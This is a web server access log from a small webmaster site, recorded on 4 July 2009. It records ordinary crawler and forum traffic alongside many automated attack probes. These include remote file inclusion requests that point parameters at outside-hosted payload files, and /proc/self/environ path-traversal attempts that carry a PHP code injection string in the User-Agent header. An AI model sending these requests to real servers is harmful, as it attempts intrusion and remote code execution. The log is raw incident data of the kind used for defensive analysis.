66.232.97.145 - - [04/Jul/2009:18:39:31 -0700] "POST /phpBB2/posting.php?sid=94cb7a33e52bef2fb463a7f8d26245fb HTTP/1.1" 200 13274 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:39:58 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 610 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:39:58 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 604 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:39:58 -0700] "GET /logs/showfile.php/access_090606.log//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:39:59 -0700] "GET /logs/showfile.php//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
72.30.142.243 - - [04/Jul/2009:18:39:59 -0700] "GET /yahoo/perl.php?d=/usr/lib/perl5/5.8.7/i386-freebsd HTTP/1.0" 200 7214 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.webmaster-showcase.net"
209.235.254.107 - - [04/Jul/2009:18:40:03 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:40:05 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 610 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:40:05 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 604 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:40:05 -0700] "GET /logs/showfile.php//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:40:05 -0700] "GET /logs/showfile.php/access_090606.log//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
64.90.164.110 - - [04/Jul/2009:18:40:14 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
212.95.226.66 - - [04/Jul/2009:18:41:09 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:41:14 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 604 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:41:14 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 610 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:41:14 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 604 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:41:14 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 610 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:41:14 -0700] "GET /logs/showfile.php//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:41:14 -0700] "GET /logs/showfile.php/access_090606.log//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:41:15 -0700] "GET /logs/showfile.php/access_090606.log//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:41:15 -0700] "GET /logs/showfile.php//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
211.230.156.161 - - [04/Jul/2009:18:41:21 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 592 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
211.230.156.161 - - [04/Jul/2009:18:41:21 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 586 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
211.230.156.161 - - [04/Jul/2009:18:41:21 -0700] "GET /logs/showfile.php//admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
211.230.156.161 - - [04/Jul/2009:18:41:21 -0700] "GET /logs/showfile.php/access_090509.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
211.230.156.161 - - [04/Jul/2009:18:41:22 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 586 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
211.230.156.161 - - [04/Jul/2009:18:41:22 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 592 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
211.230.156.161 - - [04/Jul/2009:18:41:22 -0700] "GET /logs/showfile.php//admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
211.230.156.161 - - [04/Jul/2009:18:41:22 -0700] "GET /logs/showfile.php/access_090509.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
62.149.226.208 - - [04/Jul/2009:18:41:59 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:43:15 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 600 "-" "Mozilla/5.0" "webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:43:15 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 606 "-" "Mozilla/5.0" "webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:43:16 -0700] "GET /logs/showfile.php/access.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:43:16 -0700] "GET /logs/showfile.php//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:43:23 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 600 "-" "Mozilla/5.0" "webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:43:23 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 606 "-" "Mozilla/5.0" "webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:43:23 -0700] "GET /logs/showfile.php//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:43:23 -0700] "GET /logs/showfile.php/access.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
87.106.179.130 - - [04/Jul/2009:18:43:27 -0700] "GET /logs/showfile.php/access.log%20//EN/index.php?sayfa=http://www.checksix-fr.com/phpAdsNew/olzd.txt???? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:43:28 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 600 "-" "Mozilla/5.0" "webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:43:28 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 606 "-" "Mozilla/5.0" "webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:43:28 -0700] "GET /logs/showfile.php/access.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:43:28 -0700] "GET /logs/showfile.php//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:43:43 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 606 "-" "Mozilla/5.0" "webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:43:43 -0700] "GET /logs/showfile.php//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:43:43 -0700] "GET /logs/showfile.php/access.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:43:48 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 600 "-" "Mozilla/5.0" "webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:43:58 -0700] "GET /logs/showfile.php/access_090617.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:44:06 -0700] "GET /logs/showfile.php/access_090617.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:44:07 -0700] "GET /logs/showfile.php/access_090617.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:44:23 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 600 "-" "Mozilla/5.0" "webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:44:23 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 606 "-" "Mozilla/5.0" "webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:44:23 -0700] "GET /logs/showfile.php//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:44:23 -0700] "GET /logs/showfile.php/access.log//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:44:24 -0700] "GET /logs/showfile.php/access_090617.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:44:27 -0700] "GET /logs/showfile.php//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:44:27 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 606 "-" "Mozilla/5.0" "webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:44:27 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 404 600 "-" "Mozilla/5.0" "webmaster-showcase.net"
64.191.102.117 - - [04/Jul/2009:18:44:27 -0700] "GET /logs/showfile.php/access.log//components/com_simpleboard/image_upload.php?sbp=http://law-rich.co.kr////mae_movie/id1.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
65.60.32.34 - - [04/Jul/2009:18:44:46 -0700] "POST /phpBB2/posting.php?sid=e75b527657eedaeb3177aa2e87baf289 HTTP/1.1" 200 13235 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:18:45:45 -0700] "GET /logs/showfile.php/access_090523.log/include/lib.inc.php?site_path=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:18:45:46 -0700] "GET /include/lib.inc.php?site_path=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 593 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:18:45:46 -0700] "GET /logs/showfile.php/include/lib.inc.php?site_path=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 200 1595 "-" "libwww-perl/5.805" "www.webmaster-showcase.net"
208.109.21.238 - - [04/Jul/2009:18:46:24 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
204.62.55.12 - - [04/Jul/2009:18:46:30 -0700] "GET /yahoo/perl.php?d=/usr/lib/perl5/5.8.7/Locale/Maketext HTTP/1.1" 200 3327 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "webmaster-showcase.net"
96.31.68.140 - - [04/Jul/2009:18:47:23 -0700] "POST /phpBB2/posting.php?sid=92e01a5a856f18055d46020aa03c8238 HTTP/1.1" 200 13157 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
93.174.93.58 - - [04/Jul/2009:18:47:33 -0700] "GET /php/simple-php-guestbook/gbook.txt HTTP/1.1" 200 1179648 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "webmaster-showcase.net"
65.55.210.71 - - [04/Jul/2009:18:49:59 -0700] "GET /phpBB2/viewtopic.php?t=9867&start=0&postdays=0&postorder=asc&highlight= HTTP/1.1" 200 70415 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.webmaster-showcase.net"
65.55.109.92 - - [04/Jul/2009:18:51:05 -0700] "GET /phpBB2/viewtopic.php?t=9867&start=0&postdays=0&postorder=asc&highlight= HTTP/1.0" 200 70380 "http://search.live.com/results.aspx?q=spanking" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.webmaster-showcase.net"
65.55.109.92 - - [04/Jul/2009:18:51:14 -0700] "GET /phpBB2/templates/subSilver/formIE.css HTTP/1.0" 200 354 "http://www.webmaster-showcase.net/phpBB2/viewtopic.php?t=9867&start=0&postdays=0&postorder=asc&highlight=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.webmaster-showcase.net"
69.20.70.31 - - [04/Jul/2009:18:51:42 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
85.158.185.67 - - [04/Jul/2009:18:51:43 -0700] "GET /index.php?pag=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 583 "-" "XXX<? echo \"w0000t\"; ?>XXX" "www.webmaster-showcase.net"
85.158.185.67 - - [04/Jul/2009:18:51:43 -0700] "GET /logs/showfile.php/access.log/index.php?pag=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 1595 "-" "XXX<? echo \"w0000t\"; ?>XXX" "www.webmaster-showcase.net"
85.158.185.67 - - [04/Jul/2009:18:51:44 -0700] "GET /logs/showfile.php/index.php?pag=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 3345 "-" "XXX<? echo \"w0000t\"; ?>XXX" "www.webmaster-showcase.net"
85.158.185.67 - - [04/Jul/2009:18:51:44 -0700] "GET /index.php?pag=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 583 "-" "XXX<? echo \"w0000t\"; ?>XXX" "www.webmaster-showcase.net"
85.158.185.67 - - [04/Jul/2009:18:51:44 -0700] "GET /logs/showfile.php/access.log/index.php?pag=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1595 "-" "XXX<? echo \"w0000t\"; ?>XXX" "www.webmaster-showcase.net"
85.158.185.67 - - [04/Jul/2009:18:51:45 -0700] "GET /logs/showfile.php/index.php?pag=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3345 "-" "XXX<? echo \"w0000t\"; ?>XXX" "www.webmaster-showcase.net"
65.55.210.67 - - [04/Jul/2009:18:52:12 -0700] "GET /robots.txt HTTP/1.1" 404 571 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.webmaster-showcase.net"
69.46.23.47 - - [04/Jul/2009:18:52:12 -0700] "POST /phpBB2/posting.php?sid=e71b27cb0ee5c22bc6672b27e0b3c669 HTTP/1.1" 200 13186 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
65.55.210.67 - - [04/Jul/2009:18:52:14 -0700] "GET /phpBB2/viewforum.php?f=2&topicdays=0&start=100 HTTP/1.1" 200 72847 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.webmaster-showcase.net"
66.11.230.251 - - [04/Jul/2009:18:52:32 -0700] "GET /logs/showfile.php//EN/index.php?sayfa=http://www.checksix-fr.com/phpAdsNew/olzd.txt???? HTTP/1.1" 200 1595 "-" "libwww-perl/5.65" "www.webmaster-showcase.net"
66.11.230.251 - - [04/Jul/2009:18:52:32 -0700] "GET /EN/index.php?sayfa=http://www.checksix-fr.com/phpAdsNew/olzd.txt???? HTTP/1.1" 404 573 "-" "libwww-perl/5.65" "www.webmaster-showcase.net"
66.11.230.251 - - [04/Jul/2009:18:52:32 -0700] "GET /logs/showfile.php/access.log//EN/index.php?sayfa=http://www.checksix-fr.com/phpAdsNew/olzd.txt???? HTTP/1.1" 200 1595 "-" "libwww-perl/5.65" "www.webmaster-showcase.net"
66.11.230.251 - - [04/Jul/2009:18:52:48 -0700] "GET /logs/showfile.php/access_090508.log//EN/index.php?sayfa=http://www.checksix-fr.com/phpAdsNew/olzd.txt???? HTTP/1.1" 200 1595 "-" "libwww-perl/5.65" "www.webmaster-showcase.net"
65.17.253.220 - - [04/Jul/2009:18:53:51 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
66.232.97.145 - - [04/Jul/2009:18:53:55 -0700] "POST /phpBB2/posting.php?sid=94cb7a33e52bef2fb463a7f8d26245fb HTTP/1.1" 200 13241 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
66.153.242.216 - - [04/Jul/2009:18:54:12 -0700] "GET /yahoo/SendMail.php HTTP/1.1" 200 4921 "http://us.1.p4.webhosting.yahoo.com/phpmailsetup" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)" "www.webmaster-showcase.net"
66.153.242.216 - - [04/Jul/2009:18:54:12 -0700] "GET /yahoo/images/c.gif HTTP/1.1" 404 579 "http://www.webmaster-showcase.net/yahoo/SendMail.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)" "www.webmaster-showcase.net"
209.235.254.107 - - [04/Jul/2009:18:55:01 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
85.158.185.67 - - [04/Jul/2009:18:55:03 -0700] "GET /index.php?pag=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 579 "-" "XXX<? echo \"w0000t\"; ?>XXX" "webmaster-showcase.net"
85.158.185.67 - - [04/Jul/2009:18:55:03 -0700] "GET /logs/showfile.php/access_090617.log/index.php?pag=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 1595 "-" "XXX<? echo \"w0000t\"; ?>XXX" "webmaster-showcase.net"
85.158.185.67 - - [04/Jul/2009:18:55:03 -0700] "GET /index.php?pag=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 579 "-" "XXX<? echo \"w0000t\"; ?>XXX" "webmaster-showcase.net"
85.158.185.67 - - [04/Jul/2009:18:55:04 -0700] "GET /logs/showfile.php/access_090617.log/index.php?pag=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1595 "-" "XXX<? echo \"w0000t\"; ?>XXX" "webmaster-showcase.net"
85.158.185.67 - - [04/Jul/2009:18:55:07 -0700] "GET /logs/showfile.php/index.php?pag=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 3345 "-" "XXX<? echo \"w0000t\"; ?>XXX" "webmaster-showcase.net"
85.158.185.67 - - [04/Jul/2009:18:55:07 -0700] "GET /logs/showfile.php/index.php?pag=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3345 "-" "XXX<? echo \"w0000t\"; ?>XXX" "webmaster-showcase.net"
64.90.164.110 - - [04/Jul/2009:18:55:16 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
66.11.230.251 - - [04/Jul/2009:18:55:48 -0700] "GET /logs/showfile.php/access.log%20//EN/index.php?sayfa=http://www.checksix-fr.com/phpAdsNew/olzd.txt???? HTTP/1.1" 200 1595 "-" "libwww-perl/5.65" "www.webmaster-showcase.net"
212.95.226.66 - - [04/Jul/2009:18:56:09 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
62.149.226.208 - - [04/Jul/2009:18:56:59 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
65.60.32.34 - - [04/Jul/2009:18:59:18 -0700] "POST /phpBB2/posting.php?sid=e75b527657eedaeb3177aa2e87baf289 HTTP/1.1" 200 13224 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
96.31.68.140 - - [04/Jul/2009:18:59:31 -0700] "POST /phpBB2/posting.php?sid=92e01a5a856f18055d46020aa03c8238 HTTP/1.1" 200 13129 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
208.109.21.238 - - [04/Jul/2009:19:01:24 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:19:02:32 -0700] "GET /logs/showfile.php/access_090523.log/includes/ktedit/toolbar.php?dirDepth=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
93.174.93.58 - - [04/Jul/2009:19:02:35 -0700] "GET /php/simple-php-guestbook/gbook.txt HTTP/1.1" 200 1114112 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:19:03:59 -0700] "GET /logs/showfile.php/access_090523.log/includes/ktedit/toolbar.php?dirDepth=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.4.198.28 - - [04/Jul/2009:19:04:41 -0700] "GET /phpBB2/index.php HTTP/1.0" 200 17528 "http://webmaster-showcase.net/phpBB2/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT) ::ELNSB50::000061100320025802a00111000000000507000900000000" "webmaster-showcase.net"
66.232.97.145 - - [04/Jul/2009:19:05:43 -0700] "POST /phpBB2/posting.php?sid=94cb7a33e52bef2fb463a7f8d26245fb HTTP/1.1" 200 13184 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
124.0.55.226 - - [04/Jul/2009:19:05:53 -0700] "GET /logs/showfile.php/access_090615.log/index2.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 1595 "-" "XXX<? echo \"w0000t\"; ?>XXX" "www.webmaster-showcase.net"
124.0.55.226 - - [04/Jul/2009:19:06:00 -0700] "GET /logs/showfile.php/access_090615.log/index2.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1595 "-" "XXX<? echo \"w0000t\"; ?>XXX" "www.webmaster-showcase.net"
124.0.55.226 - - [04/Jul/2009:19:06:07 -0700] "GET /index2.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 584 "-" "XXX<? echo \"w0000t\"; ?>XXX" "www.webmaster-showcase.net"
